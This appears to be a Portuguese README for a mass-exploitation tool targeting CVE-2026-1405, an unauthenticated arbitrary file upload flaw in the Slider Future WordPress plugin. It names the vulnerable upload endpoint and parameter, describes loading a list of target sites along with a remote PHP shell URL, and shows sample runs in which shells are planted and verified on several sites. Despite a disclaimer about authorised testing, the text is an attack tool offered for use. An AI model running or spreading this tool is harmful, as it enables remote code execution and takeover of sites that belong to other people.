
Slider Future <= 1.0.5 - Upload Arbitrário de Arquivos Não Autenticado
Slider Future <= 1.0.5 - Upload Arbitrário de Ficheiros Não Autenticado
Componente: Slider Future (plugin WordPress)
Versões Afetadas: ≤ 1.0.5
Vulnerabilidade: Upload Arbitrário de Ficheiros Não Autenticado
CVE: CVE-2026-1405
Pontuação CVSS: 9.8 (Crítica)
O plugin Slider Future para WordPress é vulnerável a uploads arbitrários de ficheiros devido à falta de validação do tipo de ficheiro na função slider_future_handle_image_upload em todas as versões até e incluindo a 1.0.5. Isto permite que atacantes não autenticados carreguem qualquer tipo de ficheiro—incluindo shells PHP maliciosos—diretamente no servidor afetado, possibilitando a execução remota de código.
/wp-json/slider-future/v1/upload-image/image_url (sem necessidade de autenticação).http://example1.com
https://example2.com
...
Exemplo: http://yourserver.com/shell.php
python3 CVE-2026-1405.py
Será solicitado:
list.txt)Nxploited)success_results.txt./wp-json/slider-future/v1/upload-image/image_url apontando para o seu shell.Esta ferramenta destina-se apenas a fins educacionais e de teste de segurança autorizados.
O uso não autorizado contra sites que não possui ou para os quais não tem permissão explícita para testar é ilegal.
Exploit para: CVE-2026-1405
Por: Nxploited
Alvos carregados: 12
URL do shell: http://yourserver.com/shell.php
Assinatura: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCESSO | Shell Verificado: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Falha no upload ou URL do shell não encontrado.
...
Concluído: 3/12 bem-sucedidos em 14.7s
Sucessos guardados em success_results.txt